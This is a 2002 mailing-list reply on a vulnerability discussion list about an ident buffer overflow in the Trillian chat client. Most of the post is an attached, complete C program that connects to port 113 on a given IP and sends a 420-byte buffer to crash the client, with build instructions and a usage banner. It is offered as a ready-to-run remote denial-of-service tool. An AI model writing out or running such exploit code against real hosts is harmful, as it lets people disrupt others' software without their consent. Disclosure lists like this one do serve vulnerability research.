[prev in list] [next in list] [prev in thread] [next in thread]
List: vulndiscuss
Subject: [VulnDiscuss] Re: Trillian .74 and below, ident flaw.
From: netmask {enZo} <netmask () enZ-o ! org>
Date: 2002-09-19 21:13:13
[Download RAW message or body]
> Lance Fitz-Herbert (fitzies@hotmail.com) composed on Sep 18, 2002:
Hello Lance, out of bordem I wrote one that compiles on un*x
trillident.c is attached
netmask @ enZo
["trillident.c" (TEXT/PLAIN)]
/* Trillian .74, .73 remote DoS.. Trillian Pro 1.0 \
* Exploits buffer overflow in ident when sending over
* 418 bytes.
*
* Really only works if people are on IRC (otherwise, the ident
* daemon shuts down.. And you've got to know they are running
* Trillian, obviously.
*
* bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
*
*
* Compile With:
* Linux: gcc -o trillident trillident.c
* Solaris: gcc -o trillident trillident.c -lsocket -lnsl
* Windows: Use someone elses code.
ZZZZZZZZZZZZZZZZZZZ
Z:::::::::::::::::Z
nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo
n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo
eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o
ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::oooo::::::o
e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::o::::o
e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::oo::::o
e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::oo::o o::::o
e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o::o o::::o
e::::::::::::::::e n::::n n::::n Z:::::Z o::::::oooo:::::o
e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o
e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo
e:::::::eeeeeeeeee Z:::::::::::::::::Z
ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ
ee:::::::::::::e \... www.enz-o.org .../
eeeeeeeeeeeeee
(The above is radical ascii art.. Respect it. The below is a lame DoS. )
\
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define ERR -1
void usage(char* argv0);
int dostrill(char *ip, int port);
int main(int argc, char *argv[])
{
extern int optopt;
extern char *optarg;
int errorflag = 0; /* did someone screw up? */
int port = 113; /* default port to use unless -p */
int c;
if ((argc < 2) || (argc > 6))
usage(argv[0]);
while ((c=getopt(argc, argv, "vp:")) != EOF) {
switch(c) {
case 'p':
fprintf(stderr, "Using port %s\n", optarg);
port = strtol(optarg, NULL, 10);
break;
case 'v':
fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
fprintf(stderr, "written by: netmask@enZo\n\n");
exit(0);
case ':':
fprintf(stderr, "Option -%c requires an operand\n", optopt);
errorflag++;
break;
case '?':
fprintf(stderr, "Unrecognized option: -%c\n", optopt);
errorflag++;
}
}
if (errorflag) {
usage(argv[0]);
}
/* kill them */
dostrill(argv[argc-1], port);
fprintf(stderr, "Finished!\n");
return 0;
} /* end main */
void usage(char* argv0)
{
fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
fprintf(stderr, "Written by: netmask@enZo\n\n");
fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
fprintf(stderr,
"-p \tPort to use\n"
"-v \tPrint the program info\n");
exit(1);
}
int dostrill(char *ip, int port)
{
int s, r;
char buf[420]; /* buffer to send */
struct sockaddr_in addr;
struct hostent *hp;
memset((char *) &addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(port);
memset(buf, 'A', 420);
if ((hp = gethostbyname(ip)) != NULL) {
if (hp->h_length > sizeof(addr.sin_addr)) {
hp->h_length = sizeof(addr.sin_addr); }
memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
}
else {
if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
return(0);
}
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == ERR) {
fprintf(stderr, "Couldn't Create Socket\n");
return 1;
}
r = connect(s, (struct sockaddr *) &addr, sizeof(addr));
if (r == ERR) {
fprintf(stderr, "Couldn't Establish Connection\n");
return 1;
}
fprintf(stderr, "Connected to %s and sending buffer\n\n", ip);
write(s, buf, strlen(buf)); /* send buffer */
close(s);
return 0;
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic